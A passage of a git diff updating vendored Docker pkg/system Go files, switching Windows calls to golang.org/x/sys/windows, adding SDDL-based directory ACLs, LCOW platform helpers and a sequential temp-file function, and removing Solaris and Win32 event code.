- if err := setCTime(name, mtime); err != nil { - return err - } - - return nil + return setCTime(name, mtime) } diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go index 5c87df32a2..5a3f98e199 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_test.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go index 09d58bcbfd..259138a45b 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "time" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go index 6ec9a7173c..e25232c767 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go index 2945868465..d3a115ff42 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows.go @@ -1,27 +1,26 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" "time" + + "golang.org/x/sys/windows" ) //setCTime will set the create time on a file. 
On Windows, this requires //calling SetFileTime and explicitly including the create time. func setCTime(path string, ctime time.Time) error { - ctimespec := syscall.NsecToTimespec(ctime.UnixNano()) - pathp, e := syscall.UTF16PtrFromString(path) + ctimespec := windows.NsecToTimespec(ctime.UnixNano()) + pathp, e := windows.UTF16PtrFromString(path) if e != nil { return e } - h, e := syscall.CreateFile(pathp, - syscall.FILE_WRITE_ATTRIBUTES, syscall.FILE_SHARE_WRITE, nil, - syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + h, e := windows.CreateFile(pathp, + windows.FILE_WRITE_ATTRIBUTES, windows.FILE_SHARE_WRITE, nil, + windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS, 0) if e != nil { return e } - defer syscall.Close(h) - c := syscall.NsecToFiletime(syscall.TimespecToNsec(ctimespec)) - return syscall.SetFileTime(h, &c, nil, nil) + defer windows.Close(h) + c := windows.NsecToFiletime(windows.TimespecToNsec(ctimespec)) + return windows.SetFileTime(h, &c, nil, nil) } diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go index 72d8a10619..d91e4bc6e4 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/errors.go b/vendor/github.com/docker/docker/pkg/system/errors.go index 288318985e..2573d71622 100644 --- a/vendor/github.com/docker/docker/pkg/system/errors.go +++ b/vendor/github.com/docker/docker/pkg/system/errors.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "errors" @@ -7,4 +7,7 @@ import ( var ( // ErrNotSupportedPlatform means the platform is not supported. 
ErrNotSupportedPlatform = errors.New("platform and architecture is not supported") + + // ErrNotSupportedOperatingSystem means the operating system is not supported. + ErrNotSupportedOperatingSystem = errors.New("operating system is not supported") ) diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go deleted file mode 100644 index 3ec6d22151..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/events_windows.go +++ /dev/null @@ -1,85 +0,0 @@ -package system - -// This file implements syscalls for Win32 events which are not implemented -// in golang. - -import ( - "syscall" - "unsafe" - - "golang.org/x/sys/windows" -) - -var ( - procCreateEvent = modkernel32.NewProc("CreateEventW") - procOpenEvent = modkernel32.NewProc("OpenEventW") - procSetEvent = modkernel32.NewProc("SetEvent") - procResetEvent = modkernel32.NewProc("ResetEvent") - procPulseEvent = modkernel32.NewProc("PulseEvent") -) - -// CreateEvent implements win32 CreateEventW func in golang. It will create an event object. -func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p1 uint32 - if manualReset { - _p1 = 1 - } - var _p2 uint32 - if initialState { - _p2 = 1 - } - r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep))) - use(unsafe.Pointer(namep)) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -// OpenEvent implements win32 OpenEventW func in golang. It opens an event object. 
-func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p1 uint32 - if inheritHandle { - _p1 = 1 - } - r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep))) - use(unsafe.Pointer(namep)) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -// SetEvent implements win32 SetEvent func in golang. -func SetEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procSetEvent) -} - -// ResetEvent implements win32 ResetEvent func in golang. -func ResetEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procResetEvent) -} - -// PulseEvent implements win32 PulseEvent func in golang. -func PulseEvent(handle syscall.Handle) (err error) { - return setResetPulse(handle, procPulseEvent) -} - -func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) { - r0, _, _ := proc.Call(uintptr(handle)) - if r0 != 0 { - err = syscall.Errno(r0) - } - return -} - -var temp unsafe.Pointer - -// use ensures a variable is kept alive without the GC freeing while still needed -func use(p unsafe.Pointer) { - temp = p -} diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go index 60f0514b1d..4ba8fe35bf 100644 --- a/vendor/github.com/docker/docker/pkg/system/exitcode.go +++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "fmt" @@ -17,17 +17,3 @@ func GetExitCode(err error) (int, error) { } return exitCode, fmt.Errorf("failed to get exit code") } - -// ProcessExitCode process the specified error and returns the exit status code -// if the error was of type exec.ExitError, returns nothing otherwise. 
-func ProcessExitCode(err error) (exitCode int) { - if err != nil { - var exiterr error - if exitCode, exiterr = GetExitCode(err); exiterr != nil { - // TODO: Fix this so we check the error's text. - // we've failed to retrieve exit code, so we set it to 127 - exitCode = 127 - } - } - return -} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go index 810c794786..adeb163052 100644 --- a/vendor/github.com/docker/docker/pkg/system/filesys.go +++ b/vendor/github.com/docker/docker/pkg/system/filesys.go @@ -1,21 +1,21 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( + "io/ioutil" "os" "path/filepath" ) -// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory -// ACL'd for Builtin Administrators and Local System. -func MkdirAllWithACL(path string, perm os.FileMode) error { - return MkdirAll(path, perm) +// MkdirAllWithACL is a wrapper for MkdirAll on unix systems. +func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error { + return MkdirAll(path, perm, sddl) } // MkdirAll creates a directory named path along with any necessary parents, // with permission specified by attribute perm for all dir created. -func MkdirAll(path string, perm os.FileMode) error { +func MkdirAll(path string, perm os.FileMode, sddl string) error { return os.MkdirAll(path, perm) } @@ -24,7 +24,7 @@ func IsAbs(path string) bool { return filepath.IsAbs(path) } -// The functions below here are wrappers for the equivalents in the os package. +// The functions below here are wrappers for the equivalents in the os and ioutils packages. // They are passthrough on Unix platforms, and only relevant on Windows. 
// CreateSequential creates the named file with mode 0666 (before umask), truncating @@ -52,3 +52,16 @@ func OpenSequential(name string) (*os.File, error) { func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) { return os.OpenFile(name, flag, perm) } + +// TempFileSequential creates a new temporary file in the directory dir +// with a name beginning with prefix, opens the file for reading +// and writing, and returns the resulting *os.File. +// If dir is the empty string, TempFile uses the default directory +// for temporary files (see os.TempDir). +// Multiple programs calling TempFile simultaneously +// will not choose the same file. The caller can use f.Name() +// to find the pathname of the file. It is the caller's responsibility +// to remove the file when no longer needed. +func TempFileSequential(dir, prefix string) (f *os.File, err error) { + return ioutil.TempFile(dir, prefix) +} diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go index 6094f01fd4..a1f6013f13 100644 --- a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go @@ -1,33 +1,42 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" "path/filepath" "regexp" + "strconv" "strings" + "sync" "syscall" + "time" "unsafe" winio "github.com/Microsoft/go-winio" + "golang.org/x/sys/windows" +) + +const ( + // SddlAdministratorsLocalSystem is local administrators plus NT AUTHORITY\System + SddlAdministratorsLocalSystem = "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" + // SddlNtvmAdministratorsLocalSystem is NT VIRTUAL MACHINE\Virtual Machines plus local administrators plus NT AUTHORITY\System + SddlNtvmAdministratorsLocalSystem = "D:P(A;OICI;GA;;;S-1-5-83-0)(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" ) // MkdirAllWithACL is a wrapper for MkdirAll that creates a directory 
-// ACL'd for Builtin Administrators and Local System. -func MkdirAllWithACL(path string, perm os.FileMode) error { - return mkdirall(path, true) +// with an appropriate SDDL defined ACL. +func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error { + return mkdirall(path, true, sddl) } // MkdirAll implementation that is volume path aware for Windows. -func MkdirAll(path string, _ os.FileMode) error { - return mkdirall(path, false) +func MkdirAll(path string, _ os.FileMode, sddl string) error { + return mkdirall(path, false, sddl) } // mkdirall is a custom version of os.MkdirAll modified for use on Windows // so that it is both volume path aware, and can create a directory with // a DACL. -func mkdirall(path string, adminAndLocalSystem bool) error { +func mkdirall(path string, applyACL bool, sddl string) error { if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) { return nil } @@ -61,15 +70,15 @@ func mkdirall(path string, adminAndLocalSystem bool) error { if j > 1 { // Create parent - err = mkdirall(path[0:j-1], false) + err = mkdirall(path[0:j-1], false, sddl) if err != nil { return err } } // Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result. - if adminAndLocalSystem { - err = mkdirWithACL(path) + if applyACL { + err = mkdirWithACL(path, sddl) } else { err = os.Mkdir(path, 0) } @@ -89,13 +98,12 @@ func mkdirall(path string, adminAndLocalSystem bool) error { // mkdirWithACL creates a new directory. If there is an error, it will be of // type *PathError. . // -// This is a modified and combined version of os.Mkdir and syscall.Mkdir +// This is a modified and combined version of os.Mkdir and windows.Mkdir // in golang to cater for creating a directory am ACL permitting full // access, with inheritance, to any subfolder/file for Built-in Administrators // and Local System. 
-func mkdirWithACL(name string) error { - sa := syscall.SecurityAttributes{Length: 0} - sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" +func mkdirWithACL(name string, sddl string) error { + sa := windows.SecurityAttributes{Length: 0} sd, err := winio.SddlToSecurityDescriptor(sddl) if err != nil { return &os.PathError{Op: "mkdir", Path: name, Err: err} @@ -104,12 +112,12 @@ func mkdirWithACL(name string) error { sa.InheritHandle = 1 sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) - namep, err := syscall.UTF16PtrFromString(name) + namep, err := windows.UTF16PtrFromString(name) if err != nil { return &os.PathError{Op: "mkdir", Path: name, Err: err} } - e := syscall.CreateDirectory(namep, &sa) + e := windows.CreateDirectory(namep, &sa) if e != nil { return &os.PathError{Op: "mkdir", Path: name, Err: e} } @@ -132,7 +140,7 @@ func IsAbs(path string) bool { return true } -// The origin of the functions below here are the golang OS and syscall packages, +// The origin of the functions below here are the golang OS and windows packages, // slightly modified to only cope with files, not directories due to the // specific use case. 
// @@ -164,73 +172,125 @@ func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error) if name == "" { return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT} } - r, errf := syscallOpenFileSequential(name, flag, 0) + r, errf := windowsOpenFileSequential(name, flag, 0) if errf == nil { return r, nil } return nil, &os.PathError{Op: "open", Path: name, Err: errf} } -func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { - r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0) +func windowsOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) { + r, e := windowsOpenSequential(name, flag|windows.O_CLOEXEC, 0) if e != nil { return nil, e } return os.NewFile(uintptr(r), name), nil } -func makeInheritSa() *syscall.SecurityAttributes { - var sa syscall.SecurityAttributes +func makeInheritSa() *windows.SecurityAttributes { + var sa windows.SecurityAttributes sa.Length = uint32(unsafe.Sizeof(sa)) sa.InheritHandle = 1 return &sa } -func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) { +func windowsOpenSequential(path string, mode int, _ uint32) (fd windows.Handle, err error) { if len(path) == 0 { - return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND + return windows.InvalidHandle, windows.ERROR_FILE_NOT_FOUND } - pathp, err := syscall.UTF16PtrFromString(path) + pathp, err := windows.UTF16PtrFromString(path) if err != nil { - return syscall.InvalidHandle, err + return windows.InvalidHandle, err } var access uint32 - switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) { - case syscall.O_RDONLY: - access = syscall.GENERIC_READ - case syscall.O_WRONLY: - access = syscall.GENERIC_WRITE - case syscall.O_RDWR: - access = syscall.GENERIC_READ | syscall.GENERIC_WRITE - } - if mode&syscall.O_CREAT != 0 { - access |= syscall.GENERIC_WRITE - } - if mode&syscall.O_APPEND != 0 { - access &^= syscall.GENERIC_WRITE - 
access |= syscall.FILE_APPEND_DATA - } - sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE) - var sa *syscall.SecurityAttributes - if mode&syscall.O_CLOEXEC == 0 { + switch mode & (windows.O_RDONLY | windows.O_WRONLY | windows.O_RDWR) { + case windows.O_RDONLY: + access = windows.GENERIC_READ + case windows.O_WRONLY: + access = windows.GENERIC_WRITE + case windows.O_RDWR: + access = windows.GENERIC_READ | windows.GENERIC_WRITE + } + if mode&windows.O_CREAT != 0 { + access |= windows.GENERIC_WRITE + } + if mode&windows.O_APPEND != 0 { + access &^= windows.GENERIC_WRITE + access |= windows.FILE_APPEND_DATA + } + sharemode := uint32(windows.FILE_SHARE_READ | windows.FILE_SHARE_WRITE) + var sa *windows.SecurityAttributes + if mode&windows.O_CLOEXEC == 0 { sa = makeInheritSa() } var createmode uint32 switch { - case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL): - createmode = syscall.CREATE_NEW - case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC): - createmode = syscall.CREATE_ALWAYS - case mode&syscall.O_CREAT == syscall.O_CREAT: - createmode = syscall.OPEN_ALWAYS - case mode&syscall.O_TRUNC == syscall.O_TRUNC: - createmode = syscall.TRUNCATE_EXISTING + case mode&(windows.O_CREAT|windows.O_EXCL) == (windows.O_CREAT | windows.O_EXCL): + createmode = windows.CREATE_NEW + case mode&(windows.O_CREAT|windows.O_TRUNC) == (windows.O_CREAT | windows.O_TRUNC): + createmode = windows.CREATE_ALWAYS + case mode&windows.O_CREAT == windows.O_CREAT: + createmode = windows.OPEN_ALWAYS + case mode&windows.O_TRUNC == windows.O_TRUNC: + createmode = windows.TRUNCATE_EXISTING default: - createmode = syscall.OPEN_EXISTING + createmode = windows.OPEN_EXISTING } // Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang. 
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN - h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) + h, e := windows.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0) return h, e } + +// Helpers for TempFileSequential +var rand uint32 +var randmu sync.Mutex + +func reseed() uint32 { + return uint32(time.Now().UnixNano() + int64(os.Getpid())) +} +func nextSuffix() string { + randmu.Lock() + r := rand + if r == 0 { + r = reseed() + } + r = r*1664525 + 1013904223 // constants from Numerical Recipes + rand = r + randmu.Unlock() + return strconv.Itoa(int(1e9 + r%1e9))[1:] +} + +// TempFileSequential is a copy of ioutil.TempFile, modified to use sequential +// file access. Below is the original comment from golang: +// TempFile creates a new temporary file in the directory dir +// with a name beginning with prefix, opens the file for reading +// and writing, and returns the resulting *os.File. +// If dir is the empty string, TempFile uses the default directory +// for temporary files (see os.TempDir). +// Multiple programs calling TempFile simultaneously +// will not choose the same file. The caller can use f.Name() +// to find the pathname of the file. It is the caller's responsibility +// to remove the file when no longer needed. 
+func TempFileSequential(dir, prefix string) (f *os.File, err error) { + if dir == "" { + dir = os.TempDir() + } + + nconflict := 0 + for i := 0; i < 10000; i++ { + name := filepath.Join(dir, prefix+nextSuffix()) + f, err = OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if os.IsExist(err) { + if nconflict++; nconflict > 10 { + randmu.Lock() + rand = reseed() + randmu.Unlock() + } + continue + } + break + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/system/init.go b/vendor/github.com/docker/docker/pkg/system/init.go new file mode 100644 index 0000000000..a17597aaba --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init.go @@ -0,0 +1,22 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "syscall" + "time" + "unsafe" +) + +// Used by chtimes +var maxTime time.Time + +func init() { + // chtimes initialization + if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { + // This is a 64 bit timespec + // os.Chtimes limits time to the following + maxTime = time.Unix(0, 1<<63-1) + } else { + // This is a 32 bit timespec + maxTime = time.Unix(1<<31-1, 0) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/init_unix.go b/vendor/github.com/docker/docker/pkg/system/init_unix.go new file mode 100644 index 0000000000..4996a67c12 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init_unix.go @@ -0,0 +1,7 @@ +// +build !windows + +package system // import "github.com/docker/docker/pkg/system" + +// InitLCOW does nothing since LCOW is a windows only feature +func InitLCOW(experimental bool) { +} diff --git a/vendor/github.com/docker/docker/pkg/system/init_windows.go b/vendor/github.com/docker/docker/pkg/system/init_windows.go new file mode 100644 index 0000000000..4910ff69d6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/init_windows.go @@ -0,0 +1,12 @@ +package system // import "github.com/docker/docker/pkg/system" + +// lcowSupported determines if Linux Containers on 
Windows are supported. +var lcowSupported = false + +// InitLCOW sets whether LCOW is supported or not +func InitLCOW(experimental bool) { + v := GetOSVersion() + if experimental && v.Build >= 16299 { + lcowSupported = true + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow.go b/vendor/github.com/docker/docker/pkg/system/lcow.go new file mode 100644 index 0000000000..5c3fbfe6f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow.go @@ -0,0 +1,69 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "fmt" + "runtime" + "strings" + + specs "github.com/opencontainers/image-spec/specs-go/v1" +) + +// ValidatePlatform determines if a platform structure is valid. +// TODO This is a temporary function - can be replaced by parsing from +// https://github.com/containerd/containerd/pull/1403/files at a later date. +// @jhowardmsft +func ValidatePlatform(platform *specs.Platform) error { + platform.Architecture = strings.ToLower(platform.Architecture) + platform.OS = strings.ToLower(platform.OS) + // Based on https://github.com/moby/moby/pull/34642#issuecomment-330375350, do + // not support anything except operating system. + if platform.Architecture != "" { + return fmt.Errorf("invalid platform architecture %q", platform.Architecture) + } + if platform.OS != "" { + if !(platform.OS == runtime.GOOS || (LCOWSupported() && platform.OS == "linux")) { + return fmt.Errorf("invalid platform os %q", platform.OS) + } + } + if len(platform.OSFeatures) != 0 { + return fmt.Errorf("invalid platform osfeatures %q", platform.OSFeatures) + } + if platform.OSVersion != "" { + return fmt.Errorf("invalid platform osversion %q", platform.OSVersion) + } + if platform.Variant != "" { + return fmt.Errorf("invalid platform variant %q", platform.Variant) + } + return nil +} + +// ParsePlatform parses a platform string in the format os[/arch[/variant] +// into an OCI image-spec platform structure. 
+// TODO This is a temporary function - can be replaced by parsing from +// https://github.com/containerd/containerd/pull/1403/files at a later date. +// @jhowardmsft +func ParsePlatform(in string) *specs.Platform { + p := &specs.Platform{} + elements := strings.SplitN(strings.ToLower(in), "/", 3) + if len(elements) == 3 { + p.Variant = elements[2] + } + if len(elements) >= 2 { + p.Architecture = elements[1] + } + if len(elements) >= 1 { + p.OS = elements[0] + } + return p +} + +// IsOSSupported determines if an operating system is supported by the host +func IsOSSupported(os string) bool { + if runtime.GOOS == os { + return true + } + if LCOWSupported() && os == "linux" { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_unix.go b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go new file mode 100644 index 0000000000..26397fb8a1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package system // import "github.com/docker/docker/pkg/system" + +// LCOWSupported returns true if Linux containers on Windows are supported. +func LCOWSupported() bool { + return false +} diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_windows.go b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go new file mode 100644 index 0000000000..f0139df8f7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go @@ -0,0 +1,6 @@ +package system // import "github.com/docker/docker/pkg/system" + +// LCOWSupported returns true if Linux containers on Windows are supported. 
+func LCOWSupported() bool { + return lcowSupported +} diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go similarity index 84% rename from vendor/github.com/docker/docker/pkg/system/lstat.go rename to vendor/github.com/docker/docker/pkg/system/lstat_unix.go index bd23c4d50b..7477995f1b 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go index 062cf53bfe..9fb4a191cf 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go index 49e87eb40b..359c791d9b 100644 --- a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go @@ -1,25 +1,14 @@ -// +build windows +package system // import "github.com/docker/docker/pkg/system" -package system - -import ( - "os" -) +import "os" // Lstat calls os.Lstat to get a fileinfo interface back. // This is then copied into our own locally defined structure. -// Note the Linux version uses fromStatT to do the copy back, -// but that not strictly necessary when already in an OS specific module. 
func Lstat(path string) (*StatT, error) { fi, err := os.Lstat(path) if err != nil { return nil, err } - return &StatT{ - name: fi.Name(), - size: fi.Size(), - mode: fi.Mode(), - modTime: fi.ModTime(), - isDir: fi.IsDir()}, nil + return fromStatT(&fi) } diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go index 3b6e947e67..6667eb84dc 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" // MemInfo contains memory statistics of the host system. type MemInfo struct { diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go index 385f1d5e73..d79e8b0765 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "bufio" diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go deleted file mode 100644 index 7f4f84f73a..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go +++ /dev/null @@ -1,128 +0,0 @@ -// +build solaris,cgo - -package system - -import ( - "fmt" - "unsafe" -) - -// #cgo LDFLAGS: -lkstat -// #include -// #include -// #include -// #include -// #include -// #include -// struct swaptable *allocSwaptable(int num) { -// struct swaptable *st; -// struct swapent *swapent; -// st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int)); -// swapent = st->swt_ent; -// for (int i = 0; i < num; i++,swapent++) { -// swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char)); -// } -// st->swt_n = num; -// return st; -//} -// void freeSwaptable (struct 
swaptable *st) { -// struct swapent *swapent = st->swt_ent; -// for (int i = 0; i < st->swt_n; i++,swapent++) { -// free(swapent->ste_path); -// } -// free(st); -// } -// swapent_t getSwapEnt(swapent_t *ent, int i) { -// return ent[i]; -// } -// int64_t getPpKernel() { -// int64_t pp_kernel = 0; -// kstat_ctl_t *ksc; -// kstat_t *ks; -// kstat_named_t *knp; -// kid_t kid; -// -// if ((ksc = kstat_open()) == NULL) { -// return -1; -// } -// if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) { -// return -1; -// } -// if (((kid = kstat_read(ksc, ks, NULL)) == -1) || -// ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) { -// return -1; -// } -// switch (knp->data_type) { -// case KSTAT_DATA_UINT64: -// pp_kernel = knp->value.ui64; -// break; -// case KSTAT_DATA_UINT32: -// pp_kernel = knp->value.ui32; -// break; -// } -// pp_kernel *= sysconf(_SC_PAGESIZE); -// return (pp_kernel > 0 ? pp_kernel : -1); -// } -import "C" - -// Get the system memory info using sysconf same as prtconf -func getTotalMem() int64 { - pagesize := C.sysconf(C._SC_PAGESIZE) - npages := C.sysconf(C._SC_PHYS_PAGES) - return int64(pagesize * npages) -} - -func getFreeMem() int64 { - pagesize := C.sysconf(C._SC_PAGESIZE) - npages := C.sysconf(C._SC_AVPHYS_PAGES) - return int64(pagesize * npages) -} - -// ReadMemInfo retrieves memory statistics of the host system and returns a -// MemInfo type. 
-func ReadMemInfo() (*MemInfo, error) { - - ppKernel := C.getPpKernel() - MemTotal := getTotalMem() - MemFree := getFreeMem() - SwapTotal, SwapFree, err := getSysSwap() - - if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 || - SwapFree < 0 { - return nil, fmt.Errorf("error getting system memory info %v\n", err) - } - - meminfo := &MemInfo{} - // Total memory is total physical memory less than memory locked by kernel - meminfo.MemTotal = MemTotal - int64(ppKernel) - meminfo.MemFree = MemFree - meminfo.SwapTotal = SwapTotal - meminfo.SwapFree = SwapFree - - return meminfo, nil -} - -func getSysSwap() (int64, int64, error) { - var tSwap int64 - var fSwap int64 - var diskblksPerPage int64 - num, err := C.swapctl(C.SC_GETNSWP, nil) - if err != nil { - return -1, -1, err - } - st := C.allocSwaptable(num) - _, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st)) - if err != nil { - C.freeSwaptable(st) - return -1, -1, err - } - - diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT) - for i := 0; i < int(num); i++ { - swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i)) - tSwap += int64(swapent.ste_pages) * diskblksPerPage - fSwap += int64(swapent.ste_free) * diskblksPerPage - } - C.freeSwaptable(st) - return tSwap, fSwap, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go index 44f5562882..c3690d6311 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go @@ -1,6 +1,6 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go index 3ce019dffd..56f4494268 100644 